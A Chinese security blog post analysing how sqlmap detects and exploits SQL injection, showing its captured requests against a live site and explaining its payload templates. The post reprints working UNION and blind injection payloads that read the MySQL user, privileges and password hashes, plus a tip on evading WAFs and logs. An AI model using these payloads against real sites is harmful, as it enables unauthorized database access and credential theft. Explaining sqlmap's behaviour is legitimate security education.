<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=6.7.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.7.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.7.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '6.7.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="文章首发微信公众号：信安之路 很多小伙伴在发现或者判断出注入的时候，大多数选择就是直接上sqlmap，结果往往也不尽人意，于是就有想法来谢谢sqlmap在执行到判断注入，到底发生了什么。 本文就用我们看的见的角度来分析，看看sqlmap到底发送了什么payload，这些payload是怎么出来的，不深入代码层面。 技术有限，若有错误指出来，感激不尽。">
<meta property="og:type" content="article">
<meta property="og:title" content="聊一聊SQLMAP在进行sql注入时的整个流程">
<meta property="og:url" content="http://yoursite.com/2019/06/29/sqlmap-p/index.html">
<meta property="og:site_name" content="Sriracha :)">
<meta property="og:description" content="文章首发微信公众号：信安之路 很多小伙伴在发现或者判断出注入的时候，大多数选择就是直接上sqlmap，结果往往也不尽人意，于是就有想法来谢谢sqlmap在执行到判断注入，到底发生了什么。 本文就用我们看的见的角度来分析，看看sqlmap到底发送了什么payload，这些payload是怎么出来的，不深入代码层面。 技术有限，若有错误指出来，感激不尽。">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2019/06/29/sqlmap-p/connection.png">
<meta property="og:image" content="http://yoursite.com/2019/06/29/sqlmap-p/dba-1.png">
<meta property="og:image" content="http://yoursite.com/2019/06/29/sqlmap-p/dba-2.png">
<meta property="og:image" content="http://yoursite.com/2019/06/29/sqlmap-p/dba-3.png">
<meta property="og:image" content="http://yoursite.com/2019/06/29/sqlmap-p/password.png">
<meta property="og:updated_time" content="2019-07-23T03:22:30.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="聊一聊SQLMAP在进行sql注入时的整个流程">
<meta name="twitter:description" content="文章首发微信公众号：信安之路 很多小伙伴在发现或者判断出注入的时候，大多数选择就是直接上sqlmap，结果往往也不尽人意，于是就有想法来谢谢sqlmap在执行到判断注入，到底发生了什么。 本文就用我们看的见的角度来分析，看看sqlmap到底发送了什么payload，这些payload是怎么出来的，不深入代码层面。 技术有限，若有错误指出来，感激不尽。">
<meta name="twitter:image" content="http://yoursite.com/2019/06/29/sqlmap-p/connection.png">



  <link rel="alternate" href="/atom.xml" title="Sriracha :)" type="application/atom+xml">




  <link rel="canonical" href="http://yoursite.com/2019/06/29/sqlmap-p/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>聊一聊SQLMAP在进行sql注入时的整个流程 | Sriracha :)</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Sriracha :)</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">Wow, the smell is great!</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-pentest">

    
    
    
      
    

    

    <a href="/Pentest" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>渗透测试</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-audit">

    
    
    
      
    

    

    <a href="/Audit" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>代码审计</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-python">

    
    
    
      
    

    

    <a href="/Python" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Python</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about_me">

    
    
    
      
    

    

    <a href="/About_Me" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>关于我</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-weapon">

    
    
    
      
    

    

    <a href="/weapon" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Weapon</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/06/29/sqlmap-p/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="sher10ck">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sriracha :)">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">聊一聊SQLMAP在进行sql注入时的整个流程

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-06-29 21:17:24" itemprop="dateCreated datePublished" datetime="2019-06-29T21:17:24+08:00">2019-06-29</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2019-07-23 11:22:30" itemprop="dateModified" datetime="2019-07-23T11:22:30+08:00">2019-07-23</time>
              
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>文章首发微信公众号：信安之路</p>
<p>很多小伙伴在发现或者判断出注入的时候，大多数选择就是直接上sqlmap，结果往往也不尽人意，于是就有想法来谢谢sqlmap在执行到判断注入，到底发生了什么。</p>
<p>本文就用我们看的见的角度来分析，看看sqlmap到底发送了什么payload，这些payload是怎么出来的，不深入代码层面。</p>
<p>技术有限，若有错误指出来，感激不尽。</p>
<a id="more"></a>
<p>测试环境：</p>
<ul>
<li>sqlmap(1.3.6.58#dev)</li>
<li>Burp Suite</li>
<li><a href="http://attack.com?1.php?id=1" target="_blank" rel="noopener">http://attack.com?1.php?id=1</a></li>
</ul>
<h1 id="测试方式"><a href="#测试方式" class="headerlink" title="测试方式"></a>测试方式</h1><p>利用sqlmap的proxy参数，我们将代理设置为8080端口用burpsuite进行抓包<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http://attack.com?1.php?id=1&quot; --proxy=&quot;http://127.0.0.1:8080&quot;</span><br></pre></td></tr></table></figure></p>
<p>(测试了很久好像本地搭建的环境无法抓包，所以就找了有注入点的网站，漏洞已上报给漏洞平台)</p>
<p>抓取到的包如下：<br><img src="/2019/06/29/sqlmap-p/connection.png" alt></p>
<h1 id="sqlmap的准备工作"><a href="#sqlmap的准备工作" class="headerlink" title="sqlmap的准备工作"></a>sqlmap的准备工作</h1><p>我们也观察到，sqlmap默认发送的User-Agent是这样的，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org)</span><br></pre></td></tr></table></figure></p>
<p>所以为了避免被waf或者日志里面记录，我们一般可以添加一个–random-agent参数在后面。</p>
<p>首先我们的sqlmap会连续发送出很多数据包来检测目标网站是否稳定：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">GET /xxxx.php?id=1 HTTP/1.1</span><br><span class="line">Host: www.xxxx.xxx</span><br><span class="line">Accept: */*</span><br><span class="line">User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org)</span><br><span class="line">Connection: close</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line"></span><br><span class="line">[INFO] testing connection to the target URL</span><br><span class="line">[INFO] testing if the target URL content is stable</span><br><span class="line">[INFO] target URL content is stable</span><br></pre></td></tr></table></figure></p>
<p>接下来会检测是否为dynamic，和上面的请求包相比，sqlmap修改了id后面的值<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">GET /xxxx.php?id=2324 HTTP/1.1</span><br><span class="line">Host: www.xxx.xxx</span><br><span class="line">Accept: */*</span><br><span class="line">User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org)</span><br><span class="line">Connection: close</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line"></span><br><span class="line">[INFO] testing if GET parameter &apos;id&apos; is dynamic</span><br></pre></td></tr></table></figure></p>
<p>看不懂这是什么骚操作，我们来看看源码里面怎么说(sqlmap\lib\controller\checks.py)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">def checkDynParam(place, parameter, value):</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    This function checks if the URL parameter is dynamic. If it is</span><br><span class="line">    dynamic, the content of the page differs, otherwise the</span><br><span class="line">    dynamicity might depend on another parameter.</span><br><span class="line">    &quot;&quot;&quot;</span><br></pre></td></tr></table></figure></p>
<p>根据输出语句的关键词查找，我追踪到了这个checkDynParam函数，大概的作用就是修改我们现在获取到的参数值，看修改前后的页面返回是否相同(有的时候注入有多个参数，那么有些无关紧要的参数修改后页面是没有变化的)，若有变化(或者说这个参数是真实有效的)，sqlmap才会走到下一步。</p>
<p>下一步的数据包和功能如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">GET /xxxx.php?id=1%27.%29%2C%2C.%28.%29%22 HTTP/1.1</span><br><span class="line">Host: www.xxx.xxx</span><br><span class="line">Accept: */*</span><br><span class="line">User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org)</span><br><span class="line">Connection: close</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line"></span><br><span class="line">[INFO] heuristic (basic) test shows that GET parameter &apos;id&apos; might be injectable (possible DBMS: &apos;MySQL&apos;)</span><br></pre></td></tr></table></figure></p>
<p>我们将上面的url编码解码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/xxxx.php?id=1%27.%29%2C%2C.%28.%29%22</span><br><span class="line">/xxxx.php?id=1&apos;.),,.(.)&quot;</span><br></pre></td></tr></table></figure></p>
<p>这几个字符串就能判断是Mysql数据库？又是什么骚操作，再看看源码吧(sqlmap\lib\controller\ckecks.py)：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">infoMsg += &quot; (possible DBMS: &apos;%s&apos;)&quot; % Format.getErrorParsedDBMSes()</span><br></pre></td></tr></table></figure></p>
<p>找到了一条语句，跟踪这个getErrorParsedDBMSes()函数<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">def getErrorParsedDBMSes():</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    Parses the knowledge base htmlFp list and return its values</span><br><span class="line">    formatted as a human readable string.</span><br><span class="line"></span><br><span class="line">    @return: list of possible back-end DBMS based upon error messages</span><br><span class="line">    parsing.</span><br><span class="line">    @rtype: C&#123;str&#125;</span><br><span class="line">    &quot;&quot;&quot;</span><br></pre></td></tr></table></figure></p>
<p>那么这个函数就是通过报错信息(就是上面的payload)来辨别数据库的类型，刚好我找的这个网站也是爆出了Mysql语句的错误，然后就通过正则(sqlmap/data/xml/errors.xml)识别出来啦，篇幅原因源码就不分析了。</p>
<h1 id="sqlmap的注入分析"><a href="#sqlmap的注入分析" class="headerlink" title="sqlmap的注入分析"></a>sqlmap的注入分析</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">it looks like the back-end DBMS is &apos;MySQL&apos;. Do you want to skip test payloads sp</span><br><span class="line">ecific for other DBMSes? [Y/n] Y</span><br><span class="line">for the remaining tests, do you want to include all tests for &apos;MySQL&apos; extending</span><br><span class="line">provided level (1) and risk (1) values? [Y/n] Y</span><br></pre></td></tr></table></figure>
<p>上面sqlmap已经得到了数据库的类型并且参数也是有效的，接下来往下走sqlmap就开始判断注入了(这里直接用-v3参数显示payload更加的清晰)。</p>
<p>这一块也是大家最需要搞清楚的一部分，很多小伙伴看着感觉有注入，哎，上sqlmap，然后基本上一片红，但是实际上，按照sqlmap对注入的分类，我们可以更加清晰的了解sqlmap到底做了什么，这些东西是从哪里出来。</p>
<p>首先要说一下，sqlmap有一个–technique参数，在运行的整个过程中，也是按照这几类来检测的：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">--technique=TECH..  SQL injection techniques to use (default &quot;BEUSTQ&quot;)</span><br><span class="line">B: Boolean-based blind SQL injection（布尔型注入）</span><br><span class="line">E: Error-based SQL injection（报错型注入）</span><br><span class="line">U: UNION query SQL injection（可联合查询注入）</span><br><span class="line">S: Stacked queries SQL injection（可多语句查询注入）</span><br><span class="line">T: Time-based blind SQL injection（基于时间延迟注入）</span><br><span class="line">Q: inline_query SQL injection(内联注入)</span><br></pre></td></tr></table></figure></p>
<p>对这几种注入还不熟练于心的小伙伴们要好好补一下基础</p>
<p>那么这些主要的注入语句，我们可以在sqlmap/data/xml/queries.xml中查看了解，总结的还是挺全面的，这里截取一部分出来。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;dbms value=&quot;MySQL&quot;&gt;</span><br><span class="line">        &lt;cast query=&quot;CAST(%s AS CHAR)&quot;/&gt;</span><br><span class="line">        &lt;length query=&quot;CHAR_LENGTH(%s)&quot;/&gt;</span><br><span class="line">        &lt;isnull query=&quot;IFNULL(%s,&apos; &apos;)&quot;/&gt;</span><br><span class="line">        &lt;delimiter query=&quot;,&quot;/&gt;</span><br><span class="line">        &lt;limit query=&quot;LIMIT %d,%d&quot;/&gt;</span><br><span class="line">        &lt;limitregexp query=&quot;\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)&quot; query2=&quot;\s+LIMIT\s+([\d]+)&quot;/&gt;</span><br><span class="line">        &lt;limitgroupstart query=&quot;1&quot;/&gt;</span><br><span class="line">        &lt;limitgroupstop query=&quot;2&quot;/&gt;</span><br><span class="line">        &lt;limitstring query=&quot; LIMIT &quot;/&gt;</span><br><span class="line">        &lt;order query=&quot;ORDER BY %s ASC&quot;/&gt;</span><br><span class="line">        &lt;count query=&quot;COUNT(%s)&quot;/&gt;</span><br><span class="line">        &lt;comment query=&quot;-- -&quot; query2=&quot;/*&quot; query3=&quot;#&quot;/&gt;</span><br><span class="line">        &lt;substring query=&quot;MID((%s),%d,%d)&quot;/&gt;</span><br><span class="line">        &lt;concatenate query=&quot;CONCAT(%s,%s)&quot;/&gt;</span><br><span class="line">        &lt;case query=&quot;SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)&quot;/&gt;</span><br><span class="line">        &lt;hex query=&quot;HEX(%s)&quot;/&gt;</span><br><span class="line">        &lt;inference query=&quot;ORD(MID((%s),%d,1))&gt;%d&quot;/&gt;</span><br><span class="line">        &lt;banner query=&quot;VERSION()&quot;/&gt;</span><br><span class="line">        &lt;current_user query=&quot;CURRENT_USER()&quot;/&gt;</span><br><span class="line">        &lt;current_db query=&quot;DATABASE()&quot;/&gt;</span><br><span class="line">        &lt;hostname query=&quot;@@HOSTNAME&quot;/&gt;</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">......</span><br></pre></td></tr></table></figure></p>
<p>对于每种类型的注入语句需要如何组合，在sqlmap/data/xml/payloads下有六个文件，里面主要是定义了测试的名称(也就是我们控制台中输出的内容)、风险等级、一些payload的位置等，了解一下就行了。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;test&gt;</span><br><span class="line">    &lt;title&gt;Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)&lt;/title&gt;</span><br><span class="line">    &lt;stype&gt;6&lt;/stype&gt;</span><br><span class="line">    &lt;level&gt;1&lt;/level&gt;</span><br><span class="line">    &lt;risk&gt;1&lt;/risk&gt;</span><br><span class="line">    &lt;clause&gt;1,2,3,4,5&lt;/clause&gt;</span><br><span class="line">    &lt;where&gt;1&lt;/where&gt;</span><br><span class="line">    &lt;vector&gt;[UNION]&lt;/vector&gt;</span><br><span class="line">    &lt;request&gt;</span><br><span class="line">        &lt;payload/&gt;</span><br><span class="line">        &lt;comment&gt;[GENERIC_SQL_COMMENT]&lt;/comment&gt;</span><br><span class="line">        &lt;char&gt;[CHAR]&lt;/char&gt;</span><br><span class="line">        &lt;columns&gt;[COLSTART]-[COLSTOP]&lt;/columns&gt;</span><br><span class="line">    &lt;/request&gt;</span><br><span class="line">    &lt;response&gt;</span><br><span class="line">        &lt;union/&gt;</span><br><span class="line">    &lt;/response&gt;</span><br><span class="line">&lt;/test&gt;</span><br></pre></td></tr></table></figure></p>
<p>同目录下还有一个boundaries.xml文件，里面主要是定义了一些闭合的符号，比方说我们注入点需要闭合，添加单引号、双引号、括号等一系列的组合方式，就是从这个文件当中提取出来的。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;boundary&gt;</span><br><span class="line">    &lt;level&gt;3&lt;/level&gt;</span><br><span class="line">    &lt;clause&gt;1&lt;/clause&gt;</span><br><span class="line">    &lt;where&gt;1,2&lt;/where&gt;</span><br><span class="line">    &lt;ptype&gt;3&lt;/ptype&gt;</span><br><span class="line">    &lt;prefix&gt;&apos;))&lt;/prefix&gt;</span><br><span class="line">    &lt;suffix&gt; AND ((&apos;[RANDSTR]&apos; LIKE &apos;[RANDSTR]&lt;/suffix&gt;</span><br><span class="line">&lt;/boundary&gt;</span><br></pre></td></tr></table></figure></p>
<p>所以梳理一下思路，我们最终会发送给目标服务器的payload，首先是需要闭合的(boundaries.xml)，然后从对应的注入类型的各种测试模板中提取相应的参数(比如：boolean_blind.xml)，然后在queries.xml中取出相应的表达式，最后通过tamper的渲染，输出我们最终的payload，也就是我们的 -v3 参数。</p>
<h1 id="sqlmap的一些参数"><a href="#sqlmap的一些参数" class="headerlink" title="sqlmap的一些参数"></a>sqlmap的一些参数</h1><p>我们主要分析以下两个命令：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">--is-dba</span><br><span class="line">--passwords</span><br></pre></td></tr></table></figure></p>
<p>命令主要是判断mysql用户的一些信息，当我们发现注入可以利用的时候，下一步就是要看当前用户的权限看能有什么的操作了。</p>
<h2 id="判断是否是dba权限"><a href="#判断是否是dba权限" class="headerlink" title="判断是否是dba权限"></a>判断是否是dba权限</h2><p>sqlmap一共发了两个请求包：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">GET /xxxx.php?id=-2478%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280xxxxxxx%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x7176786b71%29%2CNULL%2CNULL--%20HZdP HTTP/1.1</span><br><span class="line">Host: www.xxxx.xxx</span><br><span class="line">Accept: */*</span><br><span class="line">User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org)</span><br><span class="line">Connection: close</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">GET /xxxx.php?id=-6628%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x7178787871%2C%28CASE%20WHEN%20%28%28SELECT%20super_priv%20FROM%20mysql.user%20WHERE%20user%3D0xxxxxxxx%20LIMIT%200%2C1%29%3D0x59%29%20THEN%201%20ELSE%200%20END%29%2C0x7170627071%29--%20mOPV HTTP/1.1</span><br><span class="line">Host: www.xxxx.xxx</span><br><span class="line">Accept: */*</span><br><span class="line">User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org)</span><br><span class="line">Connection: close</span><br><span class="line">Cache-Control: no-cache</span><br></pre></td></tr></table></figure></p>
<p>将payload解码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/xxxx.php?id=-2478 UNION ALL SELECT NULL,CONCAT(0x71766a6271,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0xxxxx),NULL,NULL-- HZdP</span><br><span class="line"></span><br><span class="line">/xxxx.php?id=-6628 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178787871,(CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0xxxxx LIMIT 0,1)=0x59) THEN 1 ELSE 0 END),0x7170627071)-- mOPV</span><br></pre></td></tr></table></figure></p>
<p>我们直接在mysql控制台下执行命令：<br><img src="/2019/06/29/sqlmap-p/dba-1.png" alt><br><img src="/2019/06/29/sqlmap-p/dba-2.png" alt></p>
<p>第一个命令返回了用户名， 0x71766a6271 解码为 qvjbq，那么这一步我们可以提取出用户名了。</p>
<p>第二个命令返回了 1 ，我们将查询命令提取出来<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT super_priv FROM mysql.user WHERE user=0xxxxx LIMIT 0,1</span><br></pre></td></tr></table></figure></p>
<p>在mysql数据库下的user表中查询super_priv(超级权限)的值：<br><img src="/2019/06/29/sqlmap-p/dba-3.png" alt></p>
<p>返回了Y，所以我们判断是否为dba的思路就是通过查看mysql.user下super_priv的值。</p>
<p>这个命令有一个坑，有的时候我们所注入的服务器上面并没有mysql这个数据库，所以用这个命令的前提是mysql这个数据库要存在。</p>
<h2 id="查询密码"><a href="#查询密码" class="headerlink" title="查询密码"></a>查询密码</h2><p>抓的包：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">GET /xxx.php?id=1%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28DISTINCT%28authentication_string%29%29%20AS%20CHAR%29%2C0x20%29%20FROM%20mysql.user%20WHERE%20user%3D0x64623833323331%29%2C1%2C1%29%29%3E48 HTTP/1.1</span><br><span class="line">Host: www.xxxx.xxx</span><br><span class="line">Accept: */*</span><br><span class="line">User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org)</span><br><span class="line">Connection: close</span><br><span class="line">Cache-Control: no-cache</span><br></pre></td></tr></table></figure></p>
<p>解码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/xxxx.php?id=1 AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(authentication_string)) AS CHAR),0x20) FROM mysql.user WHERE user=0xxxxx),1,1))&gt;48</span><br></pre></td></tr></table></figure></p>
<p>这里有个很有趣的地方，我的sqlmap是1.3.6的版本，不知道之前的是不是，他是从mysql.user中获取authentication_string的值，但是很有趣的是，这个值只有在mysql版本5.7以上，password才会变成authentication_string，我们也可以从queries.xml中找到这条语句：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;passwords&gt;</span><br><span class="line">            &lt;inband query=&quot;SELECT user,authentication_string FROM mysql.user&quot; condition=&quot;user&quot;/&gt;</span><br><span class="line">            &lt;blind query=&quot;SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user=&apos;%s&apos; LIMIT %d,1&quot; count=&quot;SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user=&apos;%s&apos;&quot;/&gt;</span><br><span class="line">&lt;/passwords&gt;</span><br></pre></td></tr></table></figure></p>
<p>发现默认就是这个authentication_string，所以我们这里直接修改queries.xml中的语句，将查询的列明改成password再测试一下。</p>
<p>后面测试发现，我们在没有修改的情况下，sqlmap也会跑出密码，而且查看payload之后，sqlmap先是查了authentication_string，然后查了password:<br><img src="/2019/06/29/sqlmap-p/password.png" alt></p>
